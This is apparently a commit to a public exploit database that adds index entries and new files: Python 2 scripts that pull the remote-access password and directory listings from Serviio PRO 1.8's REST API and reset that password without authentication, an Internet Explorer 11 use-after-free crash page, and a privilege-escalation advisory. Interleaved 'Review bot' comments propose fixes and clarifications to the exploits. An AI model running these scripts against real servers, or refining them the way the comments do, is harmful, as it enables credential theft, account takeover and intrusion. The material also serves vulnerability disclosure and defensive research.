DB: 2017-05-04
5 new exploits:
Internet Explorer 11 - CMarkup::DestroySplayTree Use-After-Free
Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation
Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure
Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change
Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution
This commit is contained in:
parent
6515e26356
commit
b473ba51f3
6 changed files with 590 additions and 0 deletions
|
@ -5482,6 +5482,7 @@ id,file,description,date,author,platform,type,port
|
||||||
41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
|
41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
|
||||||
41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
|
41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
|
||||||
41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
|
41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
|
||||||
|
41957,platforms/windows/dos/41957.html,"Internet Explorer 11 - CMarkup::DestroySplayTree Use-After-Free",2017-05-03,"Marcin Ressel",windows,dos,0
|
||||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||||
|
@ -8967,6 +8968,7 @@ id,file,description,date,author,platform,type,port
|
||||||
41951,platforms/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation",2017-05-01,"Han Sahin",osx,local,0
|
41951,platforms/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation",2017-05-01,"Han Sahin",osx,local,0
|
||||||
41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0
|
41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0
|
||||||
41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
|
41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
|
||||||
|
41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
|
||||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||||
|
@ -37805,3 +37807,6 @@ id,file,description,date,author,platform,type,port
|
||||||
41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0
|
41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0
|
||||||
41950,platforms/linux/webapps/41950.py,"Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",linux,webapps,0
|
41950,platforms/linux/webapps/41950.py,"Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",linux,webapps,0
|
||||||
41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0
|
41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0
|
||||||
|
41958,platforms/java/webapps/41958.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Information Disclosure",2017-05-03,LiquidWorm,java,webapps,0
|
||||||
|
41960,platforms/java/webapps/41960.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Password Change",2017-05-03,LiquidWorm,java,webapps,0
|
||||||
|
41961,platforms/windows/webapps/41961.py,"Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution",2017-05-03,LiquidWorm,windows,webapps,0
|
||||||
|
|
|
141
platforms/java/webapps/41958.py
Executable file
141
platforms/java/webapps/41958.py
Executable file
|
@ -0,0 +1,141 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Information Disclosure
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vendor: Petr Nejedly | Six Lines Ltd
|
||||||
|
# Product web page: http://www.serviio.org
|
||||||
|
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
|
||||||
|
#
|
||||||
|
# Summary: Serviio is a free media server. It allows you to stream your media
|
||||||
|
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
|
||||||
|
# games console or mobile phone) on your connected home network.
|
||||||
|
#
|
||||||
|
# Vendor:
|
||||||
|
# "Security:
|
||||||
|
# MediaBrowser (as well as any app that uses the API) uses well proven security techniques,
|
||||||
|
# so that you can be sure your content is only accessed by you. Make sure you keep your password
|
||||||
|
# secure."
|
||||||
|
#
|
||||||
|
# Desc: The version of Serviio installed on the remote Windows/Linux host is affected
|
||||||
|
# by an information disclosure vulnerability due to improper access control enforcement
|
||||||
|
# of the Configuration REST API. An unauthenticated, remote attacker can exploit this,
|
||||||
|
# via a specially crafted request, to gain access to potentially sensitive information.
|
||||||
|
#
|
||||||
|
# Tested on: Restlet-Framework/2.2
|
||||||
|
# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
|
||||||
|
# Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
|
||||||
|
# Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
# @zeroscience
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Advisory ID: ZSL-2017-5404
|
||||||
|
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5404.php
|
||||||
|
#
|
||||||
|
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# 12.12.2016
|
||||||
|
#
|
||||||
|
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import xml.etree.ElementTree as ET
|
||||||
|
from urllib2 import Request, urlopen
|
||||||
|
|
||||||
|
if (len(sys.argv) <= 2):
|
||||||
|
print '[*] Usage: serviio_id.py <ip address> <port>'
|
||||||
|
print '[*] Example: serviio_id.py 10.211.55.3 23423'
|
||||||
|
exit(0)
|
||||||
|
|
||||||
|
host = sys.argv[1]
|
||||||
|
port = sys.argv[2]
|
||||||
|
|
||||||
|
headers = {'Accept': 'application/xml'}
|
||||||
|
request = Request('http://'+host+':'+port+'/rest/import-export/online', headers=headers)
|
||||||
|
print '\nPrinting ServiioLinks:'
|
||||||
|
print '----------------------\n'
|
||||||
|
response_body = urlopen(request).read()
|
||||||
|
roottree = ET.fromstring(response_body)
|
||||||
|
|
||||||
|
for URLs in roottree.iter('serviioLink'):
|
||||||
|
print URLs.text
|
||||||
|
|
||||||
|
print
|
||||||
|
|
||||||
|
headers = {'Accept': 'application/xml'}
|
||||||
|
#request = Request('http://'+host+':'+port+'/rest/list-folders?directory=C:\\', headers=headers)
|
||||||
|
request = Request('http://'+host+':'+port+'/rest/list-folders?directory=/etc', headers=headers)
|
||||||
|
print '\nPrinting directories:'
|
||||||
|
print '---------------------\n'
|
||||||
|
response_body = urlopen(request).read()
|
||||||
|
roottree = ET.fromstring(response_body)
|
||||||
|
|
||||||
|
for URLs in roottree.iter('path'):
|
||||||
|
print URLs.text
|
||||||
|
|
||||||
|
print
|
||||||
|
|
||||||
|
headers = {'Accept': 'application/xml'}
|
||||||
|
request = Request('http://'+host+':'+port+'/rest/remote-access', headers=headers)
|
||||||
|
print '\nPrinting mediabrowser password:'
|
||||||
|
print '-------------------------------\n'
|
||||||
|
response_body = urlopen(request).read()
|
||||||
|
roottree = ET.fromstring(response_body)
|
||||||
|
|
||||||
|
for URLs in roottree.iter('remoteUserPassword'):
|
||||||
|
print URLs.text
|
||||||
|
|
||||||
|
print
|
||||||
|
|
||||||
|
|
||||||
|
'''
|
||||||
|
rewt@zslab:~# python serviio_id.py 10.211.55.3 23423
|
||||||
|
|
||||||
|
Printing ServiioLinks:
|
||||||
|
----------------------
|
||||||
|
|
||||||
|
serviio://video:feed?url=http%3A%2F%2FRSSEXAMPLEURL%2Fzsl.xml
|
||||||
|
serviio://video:live?url=http%3A%2F%2FLIVESTREAMEXAMPLE%2Fzsl
|
||||||
|
serviio://video:web?url=http%3A%2F%2FWEBRESOURCEEXAMPLE%2Fzsl.resource
|
||||||
|
|
||||||
|
|
||||||
|
Printing directories:
|
||||||
|
---------------------
|
||||||
|
|
||||||
|
/etc/apache2
|
||||||
|
/etc/asl
|
||||||
|
/etc/cups
|
||||||
|
/etc/defaults
|
||||||
|
/etc/emond.d
|
||||||
|
/etc/mach_init.d
|
||||||
|
/etc/mach_init_per_login_session.d
|
||||||
|
/etc/mach_init_per_user.d
|
||||||
|
/etc/manpaths.d
|
||||||
|
/etc/newsyslog.d
|
||||||
|
/etc/openldap
|
||||||
|
/etc/pam.d
|
||||||
|
/etc/paths.d
|
||||||
|
/etc/periodic
|
||||||
|
/etc/pf.anchors
|
||||||
|
/etc/postfix
|
||||||
|
/etc/ppp
|
||||||
|
/etc/racoon
|
||||||
|
/etc/security
|
||||||
|
/etc/snmp
|
||||||
|
/etc/ssh
|
||||||
|
/etc/ssl
|
||||||
|
/etc/sudoers.d
|
||||||
|
|
||||||
|
|
||||||
|
Printing mediabrowser password:
|
||||||
|
-------------------------------
|
||||||
|
|
||||||
|
s3cr3to
|
||||||
|
|
||||||
|
rewt@zslab:~#
|
||||||
|
'''
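Review bot: The header's Desc ("potentially sensitive information") undersells what the script actually retrieves: the third request reads `remoteUserPassword` from `/rest/remote-access` and prints the element text as-is (a plain password in the sample output), and the second lists directory names, so this is unauthenticated credential disclosure plus filesystem enumeration, and a header line such as `# Impact: unauthenticated read of the MediaBrowser remote-access password and of server-side directory listings` would let defenders grade it correctly. The directory request is fixed to `/etc` while the Windows variant is left as commented-out code even though "Tested on" lists Windows 7; a comment stating which platform each path applies to would be clearer than dead code. Separately, `#!/usr/bin/env python` combined with the `print` statement form and `urllib2` makes this Python 2 only, so `#!/usr/bin/env python2` (likewise in 41960.py and 41961.py) states the requirement instead of failing to parse under a Python 3 `python`.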
|
77
platforms/java/webapps/41960.py
Executable file
77
platforms/java/webapps/41960.py
Executable file
|
@ -0,0 +1,77 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Password Change
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vendor: Petr Nejedly | Six Lines Ltd
|
||||||
|
# Product web page: http://www.serviio.org
|
||||||
|
# Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1
|
||||||
|
#
|
||||||
|
# Summary: Serviio is a free media server. It allows you to stream your media
|
||||||
|
# files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
|
||||||
|
# games console or mobile phone) on your connected home network.
|
||||||
|
#
|
||||||
|
# Desc: The version of Serviio installed on the remote Windows/Linux host is affected
|
||||||
|
# by an unauthenticated password modification vulnerability due to improper access
|
||||||
|
# control enforcement of the Configuration REST API. A remote attacker can exploit this,
|
||||||
|
# via a specially crafted request, to change the login password for the mediabrowser protected
|
||||||
|
# page.
|
||||||
|
#
|
||||||
|
# Tested on: Restlet-Framework/2.2
|
||||||
|
# Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
|
||||||
|
# Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
|
||||||
|
# Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
# @zeroscience
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Advisory ID: ZSL-2017-5407
|
||||||
|
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5407.php
|
||||||
|
#
|
||||||
|
# SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# 12.12.2016
|
||||||
|
#
|
||||||
|
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import xml.etree.ElementTree as ET
|
||||||
|
from urllib2 import Request, urlopen
|
||||||
|
|
||||||
|
if (len(sys.argv) <= 3):
|
||||||
|
print '[*] Usage: serviio_pwd.py <ipaddress> <port> <newpassword>'
|
||||||
|
print '[*] Example: serviio_pwd.py 10.211.55.3 23423 eagle20fox2'
|
||||||
|
exit(0)
|
||||||
|
|
||||||
|
host = sys.argv[1]
|
||||||
|
port = sys.argv[2] #default port for console is 23423, and for the mediabrowser is 23424.
|
||||||
|
lozi = sys.argv[3]
|
||||||
|
|
||||||
|
values = """
|
||||||
|
<remoteAccess>
|
||||||
|
<remoteUserPassword>{0}</remoteUserPassword>
|
||||||
|
<preferredRemoteDeliveryQuality>ORIGINAL</preferredRemoteDeliveryQuality>
|
||||||
|
<portMappingEnabled>true</portMappingEnabled>
|
||||||
|
<externalAddress>myserviio.dyndns.com</externalAddress>
|
||||||
|
</remoteAccess>"""
|
||||||
|
|
||||||
|
put = values.format(lozi)
|
||||||
|
|
||||||
|
headers = {
|
||||||
|
'Content-Type': 'application/xml',
|
||||||
|
'Accept': 'application/xml'
|
||||||
|
}
|
||||||
|
request = Request('http://'+host+':'+port+'/rest/remote-access', data=put, headers=headers)
|
||||||
|
request.get_method = lambda: 'PUT'
|
||||||
|
response_body = urlopen(request).read()
|
||||||
|
roottree = ET.fromstring(response_body)
|
||||||
|
|
||||||
|
for errorcode in roottree.iter('errorCode'):
|
||||||
|
print "\nReceived error code: "+errorcode.text
|
||||||
|
|
||||||
|
print 'Password successfully changed to: '+lozi
|
||||||
|
print 'Go to: http://'+host+':23424/mediabrowser\n'
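Review bot: `print 'Password successfully changed to: '+lozi` runs unconditionally, so the script reports success even when the loop above has just printed an `errorCode` from the response; set `failed = False` before the loop, `failed = True` inside it, and guard the two final prints with `if not failed:`. The PUT body also replaces the whole `remoteAccess` document, not just the password — it sends `portMappingEnabled` as `true` and `externalAddress` as `myserviio.dyndns.com` — so running it presumably overwrites those settings on the target as well; the header should say so, both as a warning for anyone testing against a live instance and because it shows the unauthenticated endpoint exposes the entire remote-access configuration for writing.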
|
145
platforms/windows/dos/41957.html
Executable file
145
platforms/windows/dos/41957.html
Executable file
|
@ -0,0 +1,145 @@
|
||||||
|
<!DOCTYPE html>
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
|
||||||
|
<meta http-equiv="Expires" content="0" />
|
||||||
|
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
|
||||||
|
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
|
||||||
|
<meta http-equiv="Pragma" content="no-cache" />
|
||||||
|
<style type="text/css">
|
||||||
|
body{
|
||||||
|
background-color:black;
|
||||||
|
font-color:red;
|
||||||
|
};
|
||||||
|
</style>
|
||||||
|
|
||||||
|
<script type='text/javascript'></script>
|
||||||
|
<script type="text/javascript" language="JavaScript">
|
||||||
|
|
||||||
|
/********************************
|
||||||
|
* Exploit Title: Internet Explorer 11 CMarkup::DestroySplayTree Use-After-Free
|
||||||
|
* Google Dork: n/a
|
||||||
|
* Date: 03.05.2017
|
||||||
|
* Exploit Author: Marcin Ressel
|
||||||
|
* TT: @r_esselm
|
||||||
|
* Vendor Homepage: www.microsoft.com
|
||||||
|
* Software Link: n/a
|
||||||
|
* Version: 11.0.9600.18638
|
||||||
|
* Tested on: Windows 7
|
||||||
|
* CVE : n/a
|
||||||
|
* ****************************
|
||||||
|
(151c.10a4): Access violation - code c0000005 (first chance)
|
||||||
|
First chance exceptions are reported before any exception handling.
|
||||||
|
This exception may be expected and handled.
|
||||||
|
eax=00000000 ebx=0cf14bd0 ecx=70062370 edx=00000000 esi=1195cfa0 edi=11abcfa0
|
||||||
|
eip=706af750 esp=09a5b240 ebp=09a5b3a4 iopl=0 nv up ei pl nz na po nc
|
||||||
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
|
||||||
|
MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x15ae0c:
|
||||||
|
706af750 ff36 push dword ptr [esi] ds:002b:1195cfa0=????????
|
||||||
|
0:007> !heap -p -a @esi
|
||||||
|
address 1195cfa0 found in
|
||||||
|
_DPH_HEAP_ROOT @ 9f61000
|
||||||
|
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
|
||||||
|
ef4230c: 1195c000 2000
|
||||||
|
743990b2 verifier!AVrfDebugPageHeapFree+0x000000c2
|
||||||
|
76f9170c ntdll!RtlDebugFreeHeap+0x0000002f
|
||||||
|
76f4a863 ntdll!RtlpFreeHeap+0x0000005d
|
||||||
|
76ef2bd5 ntdll!RtlFreeHeap+0x00000142
|
||||||
|
769c14ad kernel32!HeapFree+0x00000014
|
||||||
|
707ad096 MSHTML!MemoryProtection::HeapFree+0x00000046
|
||||||
|
6ff25102 MSHTML!CMarkup::DestroySplayTree+0x00000223
|
||||||
|
7000ca27 MSHTML!CMarkup::UnloadContents+0x000003c3
|
||||||
|
702b64b9 MSHTML!CMarkup::TearDownMarkupHelper+0x000000b2
|
||||||
|
702b63e0 MSHTML!CMarkup::TearDownMarkup+0x00000058
|
||||||
|
700c55a6 MSHTML!CFrameContentHelper::TearDownFrameContent+0x00000180
|
||||||
|
700c5484 MSHTML!CFrameSite::Passivate+0x00000024
|
||||||
|
6ff15107 MSHTML!CBase::PrivateRelease+0x000000c1
|
||||||
|
6fefe10e MSHTML!CElement::PrivateRelease+0x0000001a
|
||||||
|
705517cb MSHTML!CBase::JSBind_Release+0x00000050
|
||||||
|
6eed3de3 jscript9!Js::CustomExternalObject::Dispose+0x00000023
|
||||||
|
6eed3dac jscript9!SmallFinalizableHeapBlock::DisposeObjects+0x0000011e
|
||||||
|
6eed4fb0 jscript9!HeapInfo::DisposeObjects+0x000000a9
|
||||||
|
6eed4e80 jscript9!Recycler::DisposeObjects+0x0000004a
|
||||||
|
6f048af0 jscript9!ThreadContext::DisposeObjects+0x00000072
|
||||||
|
6f11b6b6 jscript9!DListBase<CustomHeap::Page>::DListBase<CustomHeap::Page>+0x0003acdb
|
||||||
|
6eec259a jscript9!HeapBucketT<SmallFinalizableHeapBlock>::SnailAlloc+0x0000003e
|
||||||
|
6eec2609 jscript9!Recycler::AllocFinalized+0x000000ac
|
||||||
|
6eec318f jscript9!ScriptEngineBase::CreateTypedObjectFromScript+0x00000055
|
||||||
|
6eec312a jscript9!ScriptEngineBase::CreateTypedObject+0x0000006a
|
||||||
|
6ff28509 MSHTML!CJScript9Holder::CBaseToVar+0x00000120
|
||||||
|
709202cc MSHTML!CRegisteredMutationObserver::CreateTransientCopy+0x0000001b
|
||||||
|
7091ff2a MSHTML!CDOMNode::AppendTransientRegisteredObservers+0x000000e3
|
||||||
|
706af72d MSHTML!`CBackgroundInfo::Property<CBackgroundImage>'::`7'::`dynamic atexit destructor for 'fieldDefaultValue''+0x0015ade9
|
||||||
|
7005f500 MSHTML!CSpliceTreeEngine::RemoveSplice+0x00004af6
|
||||||
|
70063a2e MSHTML!CMarkup::SpliceTreeInternal+0x000000a8
|
||||||
|
7052ee3f MSHTML!CDoc::CutCopyMove+0x00000d93
|
||||||
|
*
|
||||||
|
*/
|
||||||
|
|
||||||
|
var ref = [];
|
||||||
|
var doc = null;
|
||||||
|
var dom = null;
|
||||||
|
var trg = null;
|
||||||
|
var trg_parent = null;
|
||||||
|
var text_r = null;
|
||||||
|
var select_o = null;
|
||||||
|
|
||||||
|
function handle() {
|
||||||
|
|
||||||
|
try{doc.getElementsByTagName("*")[3].appendChild(document.createElement("td"));}catch(e){}
|
||||||
|
try{var tmp0=doc.getElementsByTagName("*")[3].removeNode(false).appendChild(document.createElement("button")).removeNode(true);rem.push(tmp0);}catch(e){}
|
||||||
|
try{document.body.innerHTML = "<td>1073741823<td><p><html><div><command><command><marque><td><marque><command><div><table><td><iframe>/>195936478<select><marque><rp><canvas>4278124286/><li>0/><x>4278124286/><canvas><p>/><li>/>65537<tr><command>4294967295<x><select><object>655364042322160<li>/>254<style>/></style></li><canvas><tr><th><li>65537/></li></th></tr></canvas></x>-127<html></html></tr>4042322160<div>/><marque><x>2<table>/>0</table></x></marque>52<canvas>2<li>3503345872/>65535</li></canvas>195936478<table><marque><p><table>/>1.9999999999999<style>4<style>239</style></style></table></p></marque></table>/>1094795585<html>4096<table></table></html><canvas><select></select></canvas></iframe>/>255<style><select>1024/><th>65537<canvas><p>2</p></canvas></th></select></style></div>3/>/><marque>4042322160/></marque>/>2147483646<table><marque><p><tr>/>65537/></tr></p></marque></table>1094795585/>/>65535<select><command>4096/>65537<canvas></canvas></command></select><li>255<select><table></table></select></li><tr>/><marque>1.9999999999999/>-127</marque></tr></command><table>4278124286<ol>-127<iframe><tr>1024</tr></iframe></ol></table></html><select>4294967294<marque><body>0<td><marque>1048576</marque></td></body></marque></select></td>";}catch(e){}
|
||||||
|
try{doc.execCommand("justifyCenter",false,"NULL");}catch(e){}
|
||||||
|
try{select_o.selectAllChildren(ref[1], 0);}catch(e){}
|
||||||
|
try{text_r.select();}catch(e){}
|
||||||
|
try{tree_r.setEnd(ref[0],0);}catch(e){}
|
||||||
|
try{select_o.selectAllChildren(doc.body);}catch(e){}
|
||||||
|
try{tree_r.surroundContents(ref[0]);}catch(e){}
|
||||||
|
try{text_r.pasteHTML("<svg viewBox=127 2147483647 255 5 xmlns=http://www.w3.org/2000/svg xmlns=about:blank><feGaussianBlur in=SourceGraphic /> </svg>");}catch(e){}
|
||||||
|
try{tree_r.selectNodeContents(document.body);}catch(e){}
|
||||||
|
try{trg_parent.innerHTML = trg.innerHTML;}catch(e){}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
function testcase() {
|
||||||
|
|
||||||
|
var e1f = document.getElementById("e1");
|
||||||
|
doc = document.getElementById("t1").contentWindow.document;
|
||||||
|
|
||||||
|
e = e1f.contentWindow.document.createElement("ins");
|
||||||
|
e.cite = 'about:blank';
|
||||||
|
rf = doc.body.appendChild(e);
|
||||||
|
ref.push(rf);
|
||||||
|
e = e1f.contentWindow.document.createElement("iframe");
|
||||||
|
rf = doc.body.appendChild(e);
|
||||||
|
ref.push(rf);
|
||||||
|
|
||||||
|
dom = doc.getElementsByTagName("*");
|
||||||
|
trg = dom[3];
|
||||||
|
trg_parent = doc.body;
|
||||||
|
text_r = doc.body.createTextRange();
|
||||||
|
tree_r = doc.createRange();
|
||||||
|
tree_r.setStart(trg,0);
|
||||||
|
tree_r.setEnd(trg,0);
|
||||||
|
select_o = window.getSelection();
|
||||||
|
|
||||||
|
var ob = new MutationObserver(handle);
|
||||||
|
ob.observe(doc,{ attributes: true, childList: true, characterData: true, subtree: true });
|
||||||
|
|
||||||
|
try {
|
||||||
|
trg.insertBefore(document.createElement("div"),ref[1]);
|
||||||
|
} catch(e) {}
|
||||||
|
|
||||||
|
doc.adoptNode(trg.attributes[0]);
|
||||||
|
trg.appendChild(document.createElement("animateTransform")).removeNode(false).innnerText = "À";
|
||||||
|
tmp = trg;
|
||||||
|
}
|
||||||
|
|
||||||
|
</script>
|
||||||
|
<title>IE11 MSHTML!CMarkup::DestroySplayTree Use-After-Free</title>
|
||||||
|
</head>
|
||||||
|
<body onload='testcase();'>
|
||||||
|
<iframe src='about:blank' id='t1' width="100%"></iframe><iframe width="100%" src='about:blank' id='e1'></iframe>
|
||||||
|
</body>
|
||||||
|
</html>
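Review bot: `rem` is never declared (only `ref` is), so `rem.push(tmp0)` on the second line of `handle()` throws a ReferenceError after the `removeNode`/`appendChild` chain has already executed, and the surrounding `try{}catch(e){}` hides it; `tree_r`, `tmp`, `e` and `rf` are likewise implicit globals, and `innnerText` is a misspelling that only sets an unused property. Since the reproducer is fuzzer-derived these may be deliberate, but the header block gives no hint, so a line such as `* Note: rem is undeclared and several globals are implicit; the catch blocks mask the resulting errors and are part of the reproducer` would stop a later cleanup from silently changing what the testcase does and would help whoever triages the crash trace above understand why the script looks the way it does.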
|
66
platforms/windows/local/41959.txt
Executable file
66
platforms/windows/local/41959.txt
Executable file
|
@ -0,0 +1,66 @@
|
||||||
|
Serviio PRO 1.8 DLNA Media Streaming Server Local Privilege Escalation
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Petr Nejedly | Six Lines Ltd
|
||||||
|
Product web page: http://www.serviio.org
|
||||||
|
Affected version: 1.8.0.0 PRO
|
||||||
|
|
||||||
|
Summary: Serviio is a free media server. It allows you to stream your media
|
||||||
|
files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
|
||||||
|
games console or mobile phone) on your connected home network.
|
||||||
|
|
||||||
|
Desc: The application suffers from an unquoted search path issue impacting the service
|
||||||
|
'Serviio' for Windows deployed as part of Serviio DLNA server solution. This could potentially
|
||||||
|
allow an authorized but non-privileged local user to execute arbitrary code with elevated
|
||||||
|
privileges on the system. A successful attempt would require the local user to be able to
|
||||||
|
insert their code in the system root path undetected by the OS or other security applications
|
||||||
|
where it could potentially be executed during application startup or reboot. If successful, the
|
||||||
|
local user’s code would execute with the elevated privileges of the application.
|
||||||
|
|
||||||
|
Serviio also suffers from improper permissions which can be used by a simple authenticated user
|
||||||
|
that can change the executable file with a binary of choice. The vulnerability exist due to the
|
||||||
|
improper permissions, with the 'F' flag (Full) for 'Users' group, for the Serviio directory and
|
||||||
|
its sub-directories.
|
||||||
|
|
||||||
|
|
||||||
|
Tested on: Microsoft Windows 7 Professional SP1 (EN)
|
||||||
|
Microsoft Windows 7 Ultimate SP1 (EN)
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2017-5405
|
||||||
|
Advisory URL: http://www.zeroscience.mk/en/vulnerability/ZSL-2017-5405.php
|
||||||
|
|
||||||
|
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094
|
||||||
|
|
||||||
|
|
||||||
|
12.12.2016
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
|
||||||
|
C:\>sc qc Serviio
|
||||||
|
[SC] QueryServiceConfig SUCCESS
|
||||||
|
|
||||||
|
SERVICE_NAME: Serviio
|
||||||
|
TYPE : 110 WIN32_OWN_PROCESS (interactive)
|
||||||
|
START_TYPE : 2 AUTO_START
|
||||||
|
ERROR_CONTROL : 1 NORMAL
|
||||||
|
BINARY_PATH_NAME : C:\Program Files\Serviio\bin\ServiioService.exe
|
||||||
|
LOAD_ORDER_GROUP :
|
||||||
|
TAG : 0
|
||||||
|
DISPLAY_NAME : Serviio
|
||||||
|
DEPENDENCIES : HTTP
|
||||||
|
SERVICE_START_NAME : LocalSystem
|
||||||
|
|
||||||
|
C:\>icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
|
||||||
|
C:\Program Files\Serviio\bin\ServiioService.exe BUILTIN\Users:(I)(F)
|
||||||
|
NT AUTHORITY\SYSTEM:(I)(F)
|
